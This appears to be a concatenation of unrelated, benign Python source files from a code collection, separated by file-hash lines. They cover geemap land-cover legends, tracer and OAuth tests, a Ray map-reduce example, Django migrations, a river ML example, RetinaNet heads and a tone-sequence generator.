"30 Exposed Land and Barren": "996666",
"34 Urban and Developed": "cc6699",
"35 Greenhouses": "e1e1e1",
"50 Shrubland": "ffff00",
"80 Wetland": "993399",
"110 Grassland": "cccc00",
"120 Agriculture (undifferentiated)": "cc6600",
"122 Pasture and Forages": "ffcc33",
"130 Too Wet to be Seeded": "7899f6",
"131 Fallow": "ff9900",
"132 Cereals": "660000",
"133 Barley": "dae31d",
"134 Other Grains": "d6cc00",
"135 Millet": "d2db25",
"136 Oats": "d1d52b",
"137 Rye": "cace32",
"138 Spelt": "c3c63a",
"139 Triticale": "b9bc44",
"140 Wheat": "a7b34d",
"141 Switchgrass": "b9c64e",
"142 Sorghum": "999900",
"145 Winter Wheat": "92a55b",
"146 Spring Wheat": "809769",
"147 Corn": "ffff99",
"148 Tobacco": "98887c",
"149 Ginseng": "799b93",
"150 Oilseeds": "5ea263",
"151 Borage": "52ae77",
"152 Camelina": "41bf7a",
"153 Canola and Rapeseed": "d6ff70",
"154 Flaxseed": "8c8cff",
"155 Mustard": "d6cc00",
"156 Safflower": "ff7f00",
"157 Sunflower": "315491",
"158 Soybeans": "cc9933",
"160 Pulses": "896e43",
"162 Peas": "8f6c3d",
"167 Beans": "82654a",
"174 Lentils": "b85900",
"175 Vegetables": "b74b15",
"176 Tomatoes": "ff8a8a",
"177 Potatoes": "ffcccc",
"178 Sugarbeets": "6f55ca",
"179 Other Vegetables": "ffccff",
"180 Fruits": "dc5424",
"181 Berries": "d05a30",
"182 Blueberry": "d20000",
"183 Cranberry": "cc0000",
"185 Other Berry": "dc3200",
"188 Orchards": "ff6666",
"189 Other Fruits": "c5453b",
"190 Vineyards": "7442bd",
"191 Hops": "ffcccc",
"192 Sod": "b5fb05",
"193 Herbs": "ccff05",
"194 Nursery": "07f98c",
"195 Buckwheat": "00ffcc",
"196 Canaryseed": "cc33cc",
"197 Hemp": "8e7672",
"198 Vetch": "b1954f",
"199 Other Crops": "749a66",
"200 Forest (undifferentiated)": "009900",
"210 Coniferous": "006600",
"220 Broadleaf": "00cc00",
"230 Mixedwood": "cc9900",
},
# Copernicus CORINE Land Cover https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_CORINE_V20_100m
"COPERNICUS/CORINE/V20/100m": {
"111 Artificial surfaces > Urban fabric > Continuous urban fabric": "E6004D",
"112 Artificial surfaces > Urban fabric > Discontinuous urban fabric": "FF0000",
"121 Artificial surfaces > Industrial, commercial, and transport units > Industrial or commercial units": "CC4DF2",
"122 Artificial surfaces > Industrial, commercial, and transport units > Road and rail networks and associated land": "CC0000",
"123 Artificial surfaces > Industrial, commercial, and transport units > Port areas": "E6CCCC",
"124 Artificial surfaces > Industrial, commercial, and transport units > Airports": "E6CCE6",
"131 Artificial surfaces > Mine, dump, and construction sites > Mineral extraction sites": "A600CC",
"132 Artificial surfaces > Mine, dump, and construction sites > Dump sites": "A64DCC",
"133 Artificial surfaces > Mine, dump, and construction sites > Construction sites": "FF4DFF",
"141 Artificial surfaces > Artificial, non-agricultural vegetated areas > Green urban areas": "FFA6FF",
"142 Artificial surfaces > Artificial, non-agricultural vegetated areas > Sport and leisure facilities": "FFE6FF",
"211 Agricultural areas > Arable land > Non-irrigated arable land": "FFFFA8",
"212 Agricultural areas > Arable land > Permanently irrigated land": "FFFF00",
"213 Agricultural areas > Arable land > Rice fields": "E6E600",
"221 Agricultural areas > Permanent crops > Vineyards": "E68000",
"222 Agricultural areas > Permanent crops > Fruit trees and berry plantations": "F2A64D",
"223 Agricultural areas > Permanent crops > Olive groves": "E6A600",
"231 Agricultural areas > Pastures > Pastures": "E6E64D",
"241 Agricultural areas > Heterogeneous agricultural areas > Annual crops associated with permanent crops": "FFE6A6",
"242 Agricultural areas > Heterogeneous agricultural areas > Complex cultivation patterns": "FFE64D",
"243 Agricultural areas > Heterogeneous agricultural areas > Land principally occupied by agriculture, with significant areas of natural vegetation": "E6CC4D",
"244 Agricultural areas > Heterogeneous agricultural areas > Agro-forestry areas": "F2CCA6",
"311 Forest and semi natural areas > Forests > Broad-leaved forest": "80FF00",
"312 Forest and semi natural areas > Forests > Coniferous forest": "00A600",
"313 Forest and semi natural areas > Forests > Mixed forest": "4DFF00",
"321 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Natural grasslands": "CCF24D",
"322 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Moors and heathland": "A6FF80",
"323 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Sclerophyllous vegetation": "A6E64D",
"324 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Transitional woodland-shrub": "A6F200",
"331 Forest and semi natural areas > Open spaces with little or no vegetation > Beaches, dunes, sands": "E6E6E6",
"332 Forest and semi natural areas > Open spaces with little or no vegetation > Bare rocks": "CCCCCC",
"333 Forest and semi natural areas > Open spaces with little or no vegetation > Sparsely vegetated areas": "CCFFCC",
"334 Forest and semi natural areas > Open spaces with little or no vegetation > Burnt areas": "000000",
"335 Forest and semi natural areas > Open spaces with little or no vegetation > Glaciers and perpetual snow": "A6E6CC",
"411 Wetlands > Inland wetlands > Inland marshes": "A6A6FF",
"412 Wetlands > Inland wetlands > Peat bogs": "4D4DFF",
"421 Wetlands > Maritime wetlands > Salt marshes": "CCCCFF",
"422 Wetlands > Maritime wetlands > Salines": "E6E6FF",
"423 Wetlands > Maritime wetlands > Intertidal flats": "A6A6E6",
"511 Water bodies > Inland waters > Water courses": "00CCF2",
"512 Water bodies > Inland waters > Water bodies": "80F2E6",
"521 Water bodies > Marine waters > Coastal lagoons": "00FFA6",
"522 Water bodies > Marine waters > Estuaries": "A6FFE6",
"523 Water bodies > Marine waters > Sea and ocean": "E6F2FF",
},
# Copernicus Global Land Cover Layers: CGLS-LC100 collection 2 https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_Landcover_100m_Proba-V_Global
"COPERNICUS/Landcover/100m/Proba-V/Global": {
"0 Unknown": "282828",
"20 Shrubs. Woody perennial plants with persistent and woody stems and without any defined main stem being less than 5 m tall. The shrub foliage can be either evergreen or deciduous.": "FFBB22",
"30 Herbaceous vegetation. Plants without persistent stem or shoots above ground and lacking definite firm structure. Tree and shrub cover is less than 10 %.": "FFFF4C",
"40 Cultivated and managed vegetation / agriculture. Lands covered with temporary crops followed by harvest and a bare soil period (e.g., single and multiple cropping systems). Note that perennial woody crops will be classified as the appropriate forest or shrub land cover type.": "F096FF",
"50 Urban / built up. Land covered by buildings and other man-made structures.": "FA0000",
"60 Bare / sparse vegetation. Lands with exposed soil, sand, or rocks and never has more than 10 % vegetated cover during any time of the year.": "B4B4B4",
"70 Snow and ice. Lands under snow or ice cover throughout the year.": "F0F0F0",
"80 Permanent water bodies. Lakes, reservoirs, and rivers. Can be either fresh or salt-water bodies.": "0032C8",
"90 Herbaceous wetland. Lands with a permanent mixture of water and herbaceous or woody vegetation. The vegetation can be present in either salt, brackish, or fresh water.": "0096A0",
"100 Moss and lichen.": "FAE6A0",
"111 Closed forest, evergreen needle leaf. Tree canopy >70 %, almost all needle leaf trees remain green all year. Canopy is never without green foliage.": "58481F",
"112 Closed forest, evergreen broad leaf. Tree canopy >70 %, almost all broadleaf trees remain green year round. Canopy is never without green foliage.": "009900",
"113 Closed forest, deciduous needle leaf. Tree canopy >70 %, consists of seasonal needle leaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "70663E",
"114 Closed forest, deciduous broad leaf. Tree canopy >70 %, consists of seasonal broadleaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "00CC00",
"115 Closed forest, mixed.": "4E751F",
"116 Closed forest, not matching any of the other definitions.": "007800",
"121 Open forest, evergreen needle leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, almost all needle leaf trees remain green all year. Canopy is never without green foliage.": "666000",
"122 Open forest, evergreen broad leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, almost all broadleaf trees remain green year round. Canopy is never without green foliage.": "8DB400",
"123 Open forest, deciduous needle leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, consists of seasonal needle leaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "8D7400",
"124 Open forest, deciduous broad leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, consists of seasonal broadleaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "A0DC00",
"125 Open forest, mixed.": "929900",
"126 Open forest, not matching any of the other definitions.": "648C00",
"200 Oceans, seas. Can be either fresh or salt-water bodies.": "000080",
},
# USDA NASS Cropland Data Layers https://developers.google.com/earth-engine/datasets/catalog/USDA_NASS_CDL
"USDA/NASS/CDL": {
"1 Corn": "ffd300",
"2 Cotton": "ff2626",
"3 Rice": "00a8e2",
"4 Sorghum": "ff9e0a",
"5 Soybeans": "267000",
"6 Sunflower": "ffff00",
"10 Peanuts": "70a500",
"11 Tobacco": "00af49",
"12 Sweet Corn": "dda50a",
"13 Pop or Orn Corn": "dda50a",
"14 Mint": "7cd3ff",
"21 Barley": "e2007c",
"22 Durum Wheat": "896054",
"23 Spring Wheat": "d8b56b",
"24 Winter Wheat": "a57000",
"25 Other Small Grains": "d69ebc",
"26 Dbl Crop WinWht/Soybeans": "707000",
"27 Rye": "aa007c",
"28 Oats": "a05989",
"29 Millet": "700049",
"30 Speltz": "d69ebc",
"31 Canola": "d1ff00",
"32 Flaxseed": "7c99ff",
"33 Safflower": "d6d600",
"34 Rape Seed": "d1ff00",
"35 Mustard": "00af49",
"36 Alfalfa": "ffa5e2",
"37 Other Hay/Non Alfalfa": "a5f28c",
"38 Camelina": "00af49",
"39 Buckwheat": "d69ebc",
"41 Sugarbeets": "a800e2",
"42 Dry Beans": "a50000",
"43 Potatoes": "702600",
"44 Other Crops": "00af49",
"45 Sugarcane": "af7cff",
"46 Sweet Potatoes": "702600",
"47 Misc Vegs & Fruits": "ff6666",
"48 Watermelons": "ff6666",
"49 Onions": "ffcc66",
"50 Cucumbers": "ff6666",
"51 Chick Peas": "00af49",
"52 Lentils": "00ddaf",
"53 Peas": "54ff00",
"54 Tomatoes": "f2a377",
"55 Caneberries": "ff6666",
"56 Hops": "00af49",
"57 Herbs": "7cd3ff",
"58 Clover/Wildflowers": "e8bfff",
"59 Sod/Grass Seed": "afffdd",
"60 Switchgrass": "00af49",
"61 Fallow/Idle Cropland": "bfbf77",
"63 Forest": "93cc93",
"64 Shrubland": "c6d69e",
"65 Barren": "ccbfa3",
"66 Cherries": "ff00ff",
"67 Peaches": "ff8eaa",
"68 Apples": "ba004f",
"69 Grapes": "704489",
"70 Christmas Trees": "007777",
"71 Other Tree Crops": "af9970",
"72 Citrus": "ffff7c",
"74 Pecans": "b5705b",
"75 Almonds": "00a582",
"76 Walnuts": "e8d6af",
"77 Pears": "af9970",
"81 Clouds/No Data": "f2f2f2",
"82 Developed": "999999",
"83 Water": "4970a3",
"87 Wetlands": "7cafaf",
"88 Nonag/Undefined": "e8ffbf",
"92 Aquaculture": "00ffff",
"111 Open Water": "4970a3",
"112 Perennial Ice/Snow": "d3e2f9",
"121 Developed/Open Space": "999999",
"122 Developed/Low Intensity": "999999",
"123 Developed/Med Intensity": "999999",
"124 Developed/High Intensity": "999999",
"131 Barren": "ccbfa3",
"141 Deciduous Forest": "93cc93",
"142 Evergreen Forest": "93cc93",
"143 Mixed Forest": "93cc93",
"152 Shrubland": "c6d69e",
"176 Grassland/Pasture": "e8ffbf",
"190 Woody Wetlands": "7cafaf",
"195 Herbaceous Wetlands": "7cafaf",
"204 Pistachios": "00ff8c",
"205 Triticale": "d69ebc",
"206 Carrots": "ff6666",
"207 Asparagus": "ff6666",
"208 Garlic": "ff6666",
"209 Cantaloupes": "ff6666",
"210 Prunes": "ff8eaa",
"211 Olives": "334933",
"212 Oranges": "e27026",
"213 Honeydew Melons": "ff6666",
"214 Broccoli": "ff6666",
"216 Peppers": "ff6666",
"217 Pomegranates": "af9970",
"218 Nectarines": "ff8eaa",
"219 Greens": "ff6666",
"220 Plums": "ff8eaa",
"221 Strawberries": "ff6666",
"222 Squash": "ff6666",
"223 Apricots": "ff8eaa",
"224 Vetch": "00af49",
"225 Dbl Crop WinWht/Corn": "ffd300",
"226 Dbl Crop Oats/Corn": "ffd300",
"227 Lettuce": "ff6666",
"229 Pumpkins": "ff6666",
"230 Dbl Crop Lettuce/Durum Wht": "896054",
"231 Dbl Crop Lettuce/Cantaloupe": "ff6666",
"232 Dbl Crop Lettuce/Cotton": "ff2626",
"233 Dbl Crop Lettuce/Barley": "e2007c",
"234 Dbl Crop Durum Wht/Sorghum": "ff9e0a",
"235 Dbl Crop Barley/Sorghum": "ff9e0a",
"236 Dbl Crop WinWht/Sorghum": "a57000",
"237 Dbl Crop Barley/Corn": "ffd300",
"238 Dbl Crop WinWht/Cotton": "a57000",
"239 Dbl Crop Soybeans/Cotton": "267000",
"240 Dbl Crop Soybeans/Oats": "267000",
"241 Dbl Crop Corn/Soybeans": "ffd300",
"242 Blueberries": "000099",
"243 Cabbage": "ff6666",
"244 Cauliflower": "ff6666",
"245 Celery": "ff6666",
"246 Radishes": "ff6666",
"247 Turnips": "ff6666",
"248 Eggplants": "ff6666",
"249 Gourds": "ff6666",
"250 Cranberries": "ff6666",
"254 Dbl Crop Barley/Soybeans": "267000",
},
}
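# Usage sketch (assuming geemap's Map.add_legend accepts a builtin legend name):
#
#   import geemap
#   m = geemap.Map()
#   m.add_legend(builtin_legend="NLCD")  # any key of builtin_legends above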
def ee_table_to_legend(in_table, out_file):
"""Converts an Earth Engine color table to a dictionary
Args:
in_table (str): The input file path (*.txt) to the Earth Engine color table.
out_file (str): The output file path (*.txt) to the legend dictionary.
"""
# pkg_dir = os.path.dirname(pkg_resources.resource_filename("geemap", "geemap.py"))
# ee_legend_table = os.path.join(pkg_dir, "data/template/ee_legend_table.txt")
    if not os.path.exists(in_table):
        print("The class table does not exist.")
        return
out_file = os.path.abspath(out_file)
if not os.path.exists(os.path.dirname(out_file)):
os.makedirs(os.path.dirname(out_file))
legend_dict = {}
with open(in_table) as f:
lines = f.readlines()
for index, line in enumerate(lines):
if index > 0:
items = line.split("\t")
items = [item.strip() for item in items]
color = items[1]
key = items[0] + " " + items[2]
legend_dict[key] = color
out_lines = []
out_lines.append("{\n")
for key in legend_dict.keys():
line = "\t'{}': '{}',\n".format(key, legend_dict[key])
out_lines.append(line)
out_lines[-1] = out_lines[-1].rstrip()[:-1] + "\n"
out_lines.append("}\n")
with open(out_file, "w") as f:
f.writelines(out_lines)
|
py | b4153994924f82885b8d2c278f9add38709bc455 | from falcon import testing
from ddtrace.contrib.falcon.patch import FALCON_VERSION
from tests.utils import TracerTestCase
from .app import get_app
from .test_suite import FalconTestCase
class MiddlewareTestCase(TracerTestCase, testing.TestCase, FalconTestCase):
"""Executes tests using the manual instrumentation so a middleware
is explicitly added.
"""
def setUp(self):
super(MiddlewareTestCase, self).setUp()
# build a test app with a dummy tracer
self._service = "falcon"
self.api = get_app(tracer=self.tracer)
if FALCON_VERSION >= (2, 0, 0):
self.client = testing.TestClient(self.api)
else:
self.client = self
|
py | b4153af3d95c497151a9c6b1b11ade85dce5773b | import argparse
from collections import Counter, defaultdict
import heapq
import numpy as np
import os
import ray
import wikipedia
parser = argparse.ArgumentParser()
parser.add_argument("--num-mappers",
help="number of mapper actors used", default=3)
parser.add_argument("--num-reducers",
help="number of reducer actors used", default=4)
@ray.remote
class Mapper(object):
def __init__(self, title_stream):
self.title_stream = title_stream
self.num_articles_processed = 0
self.articles = []
self.word_counts = []
def get_new_article(self):
# Get the next wikipedia article.
article = wikipedia.page(self.title_stream.next()).content
# Count the words and store the result.
self.word_counts.append(Counter(article.split(" ")))
self.num_articles_processed += 1
def get_range(self, article_index, keys):
# Process more articles if this Mapper hasn't processed enough yet.
while self.num_articles_processed < article_index + 1:
self.get_new_article()
# Return the word counts from within a given character range.
return [(k, v) for k, v in self.word_counts[article_index].items()
if len(k) >= 1 and k[0] >= keys[0] and k[0] <= keys[1]]
@ray.remote
class Reducer(object):
def __init__(self, keys, *mappers):
self.mappers = mappers
self.keys = keys
def next_reduce_result(self, article_index):
word_count_sum = defaultdict(lambda: 0)
# Get the word counts for this Reducer's keys from all of the Mappers
# and aggregate the results.
count_ids = [mapper.get_range.remote(article_index, self.keys)
for mapper in self.mappers]
# TODO(rkn): We should process these out of order using ray.wait.
for count_id in count_ids:
for k, v in ray.get(count_id):
word_count_sum[k] += v
return word_count_sum
class Stream(object):
def __init__(self, elements):
self.elements = elements
def next(self):
i = np.random.randint(0, len(self.elements))
return self.elements[i]
if __name__ == "__main__":
args = parser.parse_args()
ray.init()
# Create one streaming source of articles per mapper.
directory = os.path.dirname(os.path.realpath(__file__))
streams = []
for _ in range(args.num_mappers):
with open(os.path.join(directory, "articles.txt")) as f:
streams.append(Stream([line.strip() for line in f.readlines()]))
# Partition the keys among the reducers.
chunks = np.array_split([chr(i) for i in range(ord("a"), ord("z") + 1)],
args.num_reducers)
keys = [[chunk[0], chunk[-1]] for chunk in chunks]
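    # With the default of 4 reducers this partitions the alphabet into
    # [['a', 'g'], ['h', 'n'], ['o', 't'], ['u', 'z']]; each Reducer only
    # aggregates words whose first letter falls inside its range.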
# Create a number of mappers.
mappers = [Mapper.remote(stream) for stream in streams]
# Create a number of reduces, each responsible for a different range of
# keys. This gives each Reducer actor a handle to each Mapper actor.
reducers = [Reducer.remote(key, *mappers) for key in keys]
article_index = 0
while True:
print("article index = {}".format(article_index))
wordcounts = {}
counts = ray.get([reducer.next_reduce_result.remote(article_index)
for reducer in reducers])
for count in counts:
wordcounts.update(count)
most_frequent_words = heapq.nlargest(10, wordcounts,
key=wordcounts.get)
for word in most_frequent_words:
print(" ", word, wordcounts[word])
article_index += 1
|
py | b4153b65d8b82a7b1333e1be7c00b9212d64ebdd | from copy import deepcopy
from mock import patch
from requests_oauthlib import OAuth2Session
from api_buddy.network.auth.oauth2 import get_oauth2_session, APPLICATION_JSON
from tests.helpers import (
TEST_PREFERENCES,
TEST_OPTIONS,
TEMP_FILE,
TempYAMLTestCase,
mock_get,
)
class TestGetOauthSession(TempYAMLTestCase):
@mock_get()
@patch('requests.get')
def test_returns_a_session(self, mock_get):
sesh = get_oauth2_session(
TEST_OPTIONS,
deepcopy(TEST_PREFERENCES),
TEMP_FILE,
)
assert type(sesh) == OAuth2Session
@mock_get()
@patch('requests.get')
def test_adds_headers(self, mock_get):
sesh = get_oauth2_session(
TEST_OPTIONS,
deepcopy(TEST_PREFERENCES),
TEMP_FILE,
)
headers = sesh.headers
assert headers['Accept'] == APPLICATION_JSON
assert headers['Content-Type'] == APPLICATION_JSON
|
py | b4153e7d5a2cf5c439d69ed6873d5a48a161caed | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import markupfield.fields
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('companies', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Sponsor',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now, blank=True)),
('updated', models.DateTimeField(blank=True)),
('content', markupfield.fields.MarkupField(rendered_field=True, blank=True)),
('content_markup_type', models.CharField(max_length=30, choices=[('', '--'), ('html', 'html'), ('plain', 'plain'), ('markdown', 'markdown'), ('restructuredtext', 'restructuredtext')], default='restructuredtext', blank=True)),
('is_published', models.BooleanField(db_index=True, default=False)),
('featured', models.BooleanField(help_text='Check to include Sponsor in feature rotation', db_index=True, default=False)),
('_content_rendered', models.TextField(editable=False)),
('company', models.ForeignKey(to='companies.Company')),
('creator', models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL, related_name='sponsors_sponsor_creator', blank=True)),
('last_modified_by', models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL, related_name='sponsors_sponsor_modified', blank=True)),
],
options={
'verbose_name': 'sponsor',
'verbose_name_plural': 'sponsors',
},
bases=(models.Model,),
),
]
|
py | b4153e7dc22282585d024cbc5a286b175fe3948e | from river import compose
from river import preprocessing
from river import linear_model
from river import metrics
from river import datasets
from river import optim
optimizer = optim.SGD(0.1)
model = compose.Pipeline(
preprocessing.StandardScaler(),
linear_model.LogisticRegression(optimizer)
)
metric = metrics.ROCAUC()
precision = metrics.Precision()
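# Progressive (prequential) validation: each sample is scored with the
# prediction made *before* the model learns from it, so every prediction is
# effectively out-of-sample.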
for x, y in datasets.Phishing():
y_pred = model.predict_proba_one(x)
model.learn_one(x, y)
metric.update(y, y_pred)
precision.update(y, y_pred)
print(metric)
print(precision)
|
py | b4153ede269ab6ad470e107b72d853ed2ffd8c41 | class NamedExplodingObject(object):
"""An object which has no attributes but produces a more informative
error message when accessed.
Parameters
----------
name : str
The name of the object. This will appear in the error messages.
Notes
-----
One common use for this object is so ensure that an attribute always exists
even if sometimes it should not be used.
"""
def __init__(self, name, extra_message=None):
self._name = name
self._extra_message = extra_message
def __getattr__(self, attr):
extra_message = self._extra_message
        raise AttributeError(
            'attempted to access attribute %r of ExplodingObject %r%s' % (
                attr,
                self._name,
                ' ' + extra_message if extra_message is not None else '',
            ),
        )
def __repr__(self):
return '%s(%r%s)' % (
type(self).__name__,
self._name,
# show that there is an extra message but truncate it to be
# more readable when debugging
', extra_message=...' if self._extra_message is not None else '',
)
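# Usage sketch: any attribute access on the placeholder raises an
# AttributeError that names the placeholder, e.g.
#
#   obj = NamedExplodingObject('results', extra_message='call compute() first')
#   obj.value  # AttributeError mentioning 'results' and the extra message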
|
py | b4153f6b7b9e362e90aee5b2f1ec0083e8fa0e17 | # Generated by Django 2.2.1 on 2019-06-13 09:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('internet_nl_dashboard', '0033_auto_20190604_1242'),
]
operations = [
migrations.AlterField(
model_name='account',
name='internet_nl_api_password',
field=models.TextField(blank=True, help_text='New values will automatically be encrypted.', null=True),
),
]
|
py | b4153ffafb41099f951afdc540259b1454c0ab31 | import numpy as np
import tensorflow as tf
from retinanet.model.head.detection_head import DetectionHead
def build_detection_heads(
params,
min_level,
max_level,
conv_2d_op_params=None,
normalization_op_params=None,
activation_fn=None):
if activation_fn is None:
raise ValueError('`activation_fn` cannot be None')
box_head = DetectionHead(
num_convs=params.num_convs,
filters=params.filters,
output_filters=params.num_anchors * 4,
min_level=min_level,
max_level=max_level,
prediction_bias_initializer='zeros',
conv_2d_op_params=conv_2d_op_params,
normalization_op_params=normalization_op_params,
activation_fn=activation_fn,
name='box-head')
prior_prob_init = tf.constant_initializer(-np.log((1 - 0.01) / 0.01))
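    # RetinaNet-style prior: initialising the classification bias to
    # -log((1 - pi) / pi) with pi = 0.01 makes every anchor start out
    # predicting ~1% foreground probability, which stabilises early training.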
class_head = DetectionHead(
num_convs=params.num_convs,
filters=params.filters,
output_filters=params.num_anchors*params.num_classes,
min_level=min_level,
max_level=max_level,
prediction_bias_initializer=prior_prob_init,
conv_2d_op_params=conv_2d_op_params,
normalization_op_params=normalization_op_params,
activation_fn=activation_fn,
name='class-head')
return box_head, class_head
def build_auxillary_head(
num_convs,
filters,
num_anchors,
min_level,
max_level,
conv_2d_op_params=None,
normalization_op_params=None,
activation_fn=None):
if activation_fn is None:
raise ValueError('`activation_fn` cannot be None')
prior_prob_init = tf.constant_initializer(-np.log((1 - 0.5) / 0.5))
auxillary_head = DetectionHead(
num_convs=num_convs,
filters=filters,
output_filters=num_anchors,
min_level=min_level,
max_level=max_level,
prediction_bias_initializer=prior_prob_init,
conv_2d_op_params=conv_2d_op_params,
normalization_op_params=normalization_op_params,
activation_fn=activation_fn,
name='auxillary-head')
return auxillary_head
|
py | b415400f36c9bb90f8d3262297b5cfdbf462fc83 | from music import millis, herz
fout = open("music.txt", "w")
def tone(pin, frequency, duration):
d = millis(duration)
dH = d // 256
dL = d % 256
print(hex(dH), hex(dL), hex(herz(frequency)), sep=',', end=',', file=fout)
def delay(duration):
d = millis(duration)
dH = d // 256
dL = d % 256
print(hex(dH), hex(dL), hex(0), sep=',', end=',', file=fout)
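# Every tone()/delay() call appends three comma-separated hex values to
# music.txt: duration high byte, duration low byte, and the value returned by
# herz(frequency) (0 for a pure delay).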
tonePin = 11;
tone(tonePin, 1244, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 624.99975);
delay(694.444166667);
delay(520.833125);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1244, 624.99975);
delay(694.444166667);
delay(520.833125);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 1864, 624.99975);
delay(694.444166667);
delay(520.833125);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 234.37490625);
delay(260.4165625);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(260.4165625);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 234.37490625);
delay(260.4165625);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(260.4165625);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1864, 234.37490625);
delay(260.4165625);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(260.4165625);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
tone(tonePin, 311, 234.37490625);
delay(260.4165625);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 466, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 156.2499375);
delay(173.611041667);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1244, 234.37490625);
delay(260.4165625);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 311, 78.12496875);
delay(86.8055208333);
tone(tonePin, 246, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 207, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 78.12496875);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1479, 156.2499375);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1661, 78.12496875);
delay(86.8055208333);
delay(173.611041667);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
tone(tonePin, 1864, 234.37490625);
delay(260.4165625);
tone(tonePin, 493, 78.12496875);
delay(86.8055208333);
delay(86.8055208333);
